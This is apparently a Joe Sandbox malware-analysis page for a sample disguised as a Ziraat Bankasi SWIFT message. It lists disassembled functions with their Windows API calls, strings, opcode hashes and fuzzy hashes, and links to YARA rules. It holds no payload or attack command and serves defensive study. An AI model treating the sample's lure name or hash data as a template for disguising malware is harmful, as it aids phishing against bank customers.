Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 56e347667a03376bd54fe83bfa5f73d04b3f4ddc08a20f643b49139bf5bac54d
Instruction ID: dcae6e7d1b8d05a79b1feafa5304b8193a641ece5e18adf513277212ff7eed32
Opcode Fuzzy Hash: 56e347667a03376bd54fe83bfa5f73d04b3f4ddc08a20f643b49139bf5bac54d
Instruction Fuzzy Hash: 46516831A2828196CB657B14C901FBE2BD8DB40710F34CD6CF8C6822EADF358ED4DA46

Function 000E4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0013DC50,?,0000000F,0000000C,00000016,0013DC50,?), ref: 000E4645

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 000E46C5

Strings

THIS, xrefs: 000E4703
REMOVE, xrefs: 000E4676

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: eb2b47a58cdfd0edd3aaf9e02d70e4d5552e763062ca2216b022adf9795291bf
Instruction ID: 3bc9d59e882da858f706cd97d6d2aef00992d6cd5b391b1e10a9187f239cf63d
Opcode Fuzzy Hash: eb2b47a58cdfd0edd3aaf9e02d70e4d5552e763062ca2216b022adf9795291bf
Instruction Fuzzy Hash: 5E417F74A042999FCF00EFA5C881AEEB7F5FF4A304F148059E956AB3A2DB349D45CB50

Function 0010A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0013DC00,00000000,?,?,?,?), ref: 0010A6D8
GetWindowLongW.USER32 ref: 0010A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0010A705

Strings

SysTreeView32, xrefs: 0010A6AA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 93e32fa7272d7f0b8171998abf970ca8d0e03db5625ee7d6b625acf8c0fb9773
Instruction ID: 5e531d20522735bd699cbeb9bcf0b25299dd7faf63a8ed531efd9a66698b04f3
Opcode Fuzzy Hash: 93e32fa7272d7f0b8171998abf970ca8d0e03db5625ee7d6b625acf8c0fb9773
Instruction Fuzzy Hash: A031BE35600205AFDB218F38DC41BEA77A9EF49324F244725F8B5932E1D7B1AC619B50

Function 0010A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0010A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0010A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0010A196

Strings

SysMonthCal32, xrefs: 0010A129

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: c9de3cb00172939653f134c9656a8daced3737f29c5213fbf0481db23dff8fe9
Instruction ID: 159014aea51f4d49f975a7d44f0430c8f4f6b20635d3665020396eadc4ef4be1
Opcode Fuzzy Hash: c9de3cb00172939653f134c9656a8daced3737f29c5213fbf0481db23dff8fe9
Instruction Fuzzy Hash: DB219F32510218BBEF158FA4CC46FEA3BB9EF48714F110214FA95AB1D0D7B5AC95CB90

Function 0010A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0010A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0010A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0010A956

Strings

msctls_updown32, xrefs: 0010A8BB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: aca9afedcbc98c739c08f5e28870741cbee43eee9fb106346109b1b5f28717ae
Instruction ID: 885a8c5c2afad3ec68874633a773281fbbac6446fa91c488f918e67c5ab54c2c
Opcode Fuzzy Hash: aca9afedcbc98c739c08f5e28870741cbee43eee9fb106346109b1b5f28717ae
Instruction Fuzzy Hash: 332192B5600209BFDB10DF28DC81DA737ADEF5A398B450459FA459B2A1CBB0EC518B61

Function 001099A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00109A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00109A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00109A65

Strings

Listbox, xrefs: 001099FD

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 74109240880bad9222cec8cd485909ee6b0407f1cee5c011ac8be29726cd069e
Instruction ID: ceddb214358cb812ed9ff0af7d7da4423f740b225422f9c2312e13d196592aef
Opcode Fuzzy Hash: 74109240880bad9222cec8cd485909ee6b0407f1cee5c011ac8be29726cd069e
Instruction Fuzzy Hash: C9210432600118BFDF218F54CC85FBB3BAAEF89754F018128F9949B1D1C7B19C5287A0

Function 000DB5B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 000DB5D2
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000DB5E9
SendMessageW.USER32(?,0000000D,?,00000000), ref: 000DB621

Strings

@U=u, xrefs: 000DB621

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 71ee029c208b8e632cf73282e6cfcc0551503f13f2c59203d86ea8a3dcc12a99
Instruction ID: 38ca66519f76a930e7dab087a4b55a7b2dd6b4ac50fa38bfa2fcd1c8b600153d
Opcode Fuzzy Hash: 71ee029c208b8e632cf73282e6cfcc0551503f13f2c59203d86ea8a3dcc12a99
Instruction Fuzzy Hash: 63216D72600208FFDF24DBA8D842AAEB7FDFF44340F16045AE505E3290DB75AA558AA4

Function 000F87A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000402,00000000,00000000), ref: 000F87F3
SendMessageW.USER32(0000000C,00000000,?), ref: 000F8834
SendMessageW.USER32(0000000C,00000000,?), ref: 000F885C

Strings

@U=u, xrefs: 000F87F3, 000F8834, 000F885C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: e8a68fc5857379bf8ef0435b6dc3d8fe2656110e9ebb3d663c8cf40e461b4d4b
Instruction ID: d3e5b0ff1dfc39cb5414fa9a29813c488e22fe4c9a75d4d5ff131832aecf4bc9
Opcode Fuzzy Hash: e8a68fc5857379bf8ef0435b6dc3d8fe2656110e9ebb3d663c8cf40e461b4d4b
Instruction Fuzzy Hash: 71218C75600500EFDB10EB65DC85EAAB7F9FF0A700B418051FA099BAA1CB70FC91DB90

Function 0010A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0010A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0010A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0010A48F

Strings

msctls_trackbar32, xrefs: 0010A444

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: dac49d5fbd133b2c7eba91807cf2a2d54d7b125c625546c33f254d9e16ab15cc
Instruction ID: 0b13e4d8d317002822f3c54dbfa2a550cda453da050b450b045b7f2f3bf1fb86
Opcode Fuzzy Hash: dac49d5fbd133b2c7eba91807cf2a2d54d7b125c625546c33f254d9e16ab15cc
Instruction Fuzzy Hash: B411C175200308BAEF245F65CC49FAB3BA9EF88754F064218FA85A60D1D3F2A851CB20

Function 00109617 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00109699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001096A8

Strings

edit, xrefs: 0010967D
@U=u, xrefs: 001096A8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$edit
API String ID: 2978978980-590756393
Opcode ID: 9251ab9354b7b9fcce52df7595239406182c06c9a0b8e162966e3714fb439037
Instruction ID: b184cdd2462819a70be66cb72b25fb00b64fc7775d181f11885ea87875f697db
Opcode Fuzzy Hash: 9251ab9354b7b9fcce52df7595239406182c06c9a0b8e162966e3714fb439037
Instruction Fuzzy Hash: 24118C71500208ABEF205FA4EC50EEB3B6AEB05378F504714F9A5931E1C7B6DC919760

Function 000DB781 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000DB7EF

Strings

ListBox, xrefs: 000DB7B9
ComboBox, xrefs: 000DB78B
@U=u, xrefs: 000DB7EF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: 4269a52e7c9075b1bd53fc17ed1b1d903d8fffc80a821231d4e9b24b4a3bc563
Instruction ID: bd6095ca2ef884d5ab5517d326e149cc1f090b24902b3ebea82961bf221d843c
Opcode Fuzzy Hash: 4269a52e7c9075b1bd53fc17ed1b1d903d8fffc80a821231d4e9b24b4a3bc563
Instruction Fuzzy Hash: 6C01F171600214EBDB04EBA4CC42DFE33A9AF46310B05061AF462673C2EB705808C7A0

Function 000DB67D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 000DB6EB

Strings

ListBox, xrefs: 000DB6B5
ComboBox, xrefs: 000DB687
@U=u, xrefs: 000DB6EB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: 7b1e315e277026cb73f18fafbfb47d5dbfa4f6047e69b8138a1bb76d4a371cfd
Instruction ID: b72491ecc666d6b40e1140a2a9671861461ddde39f5ec9cdc2d821eaa4686e9d
Opcode Fuzzy Hash: 7b1e315e277026cb73f18fafbfb47d5dbfa4f6047e69b8138a1bb76d4a371cfd
Instruction Fuzzy Hash: 6401A272641204EBDB14EBA4D952FFE73A89F1A340F15001AB402B7382EB649E1887B5

Function 000DB700 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 000DB76C

Strings

ListBox, xrefs: 000DB738
ComboBox, xrefs: 000DB70A
@U=u, xrefs: 000DB76C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: c008d2ed5cd39ca6c2e849bb7b996f76d37b757d2c0852e91fa1a82e28108dd3
Instruction ID: 321751b50137155bb7465811bb089401855efde3fe548bd70df7d040b822219b
Opcode Fuzzy Hash: c008d2ed5cd39ca6c2e849bb7b996f76d37b757d2c0852e91fa1a82e28108dd3
Instruction Fuzzy Hash: B401A272640204EBDB14E7A4D902FFE73AC9B16340F15001AB402B7392DB605E1987B5

Function 0010D974 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00161628,001104C9,000000FC,?,00000000,00000000,?,?,?,0011E47E,?,?,?,?,?), ref: 0010D976
GetFocus.USER32 ref: 0010D97E

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

Part of subcall function 000BB526: GetWindowLongW.USER32(?,000000EB), ref: 000BB537

SendMessageW.USER32(00BE7C20,000000B0,000001BC,000001C0), ref: 0010D9F0

Strings

@U=u, xrefs: 0010D9F0

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: 64dc592ab37c9176e38221d94aefec423fd8a7868ac3bd90bb76b3ab10d0d823
Instruction ID: 01671e7a5882b083e8d59eec6532ed6c0c2523d5c9f7ebf6a9d03a68b11ee02b
Opcode Fuzzy Hash: 64dc592ab37c9176e38221d94aefec423fd8a7868ac3bd90bb76b3ab10d0d823
Instruction Fuzzy Hash: 0B01B5352002009FC7248F68EC84AA673E6FF89314F1C03A9E859872F1DBB1AC86CB10

Function 000A1000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000A103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000A1052

SendMessageW.USER32(?,0000000C,00000000,?), ref: 000A101C
GetParent.USER32 ref: 00112026
InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?), ref: 0011202D

Strings

@U=u, xrefs: 000A101C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID: @U=u
API String ID: 3648793173-2594219639
Opcode ID: ed79e7e7ae296c70a59dea8a8b64eb6603090ce5b6baf25540ceb89093ba6ad0
Instruction ID: 06c1c3e49f3bc29f4047aad3aedb5d2d8f7b71e117343bcac469737a36271afb
Opcode Fuzzy Hash: ed79e7e7ae296c70a59dea8a8b64eb6603090ce5b6baf25540ceb89093ba6ad0
Instruction Fuzzy Hash: CCF01535140294BBEF356FA0EC09FD67BA9AB13790F204025F5949A0A1C6A258A2AB60

Function 000C2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000C2350,?), ref: 000C22A1
GetProcAddress.KERNEL32(00000000), ref: 000C22A8

Strings

combase.dll, xrefs: 000C229C
RoInitialize, xrefs: 000C2290

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 3a64b996476e94165d1f81634614bf21345f92f53341fc677a17aa0a1d515bb5
Instruction ID: 7b9745ad20b8f2208e24febf24189be858b432c9fc907ccbaf6ecbc926ef2bbc
Opcode Fuzzy Hash: 3a64b996476e94165d1f81634614bf21345f92f53341fc677a17aa0a1d515bb5
Instruction Fuzzy Hash: 4BE01A706A0310ABDB615F70FC4AF1A37A4BB05702F504424F102D68E0DBF580D1CF04

Function 000C235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000C2276), ref: 000C2376
GetProcAddress.KERNEL32(00000000), ref: 000C237D

Strings

RoUninitialize, xrefs: 000C2365
combase.dll, xrefs: 000C2371

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 4842f7841f00a369df627750985c7e2ab679b9bd15bbb7933d1ff6d7035d84a9
Instruction ID: 670f06ca20519f32caaf447f22281523716b22888be6c28ecef0edfd07724393
Opcode Fuzzy Hash: 4842f7841f00a369df627750985c7e2ab679b9bd15bbb7933d1ff6d7035d84a9
Instruction Fuzzy Hash: F5E0B670596300EFDB626F60FD0DF063AA4BB19702F520414F109D68F0CBF995E09A14

Function 0011AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0011AC60
__swprintf.LIBCMT ref: 0011AC94

Strings

%.3d, xrefs: 0011AC6E
WIN_XPe, xrefs: 0011ACD3

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

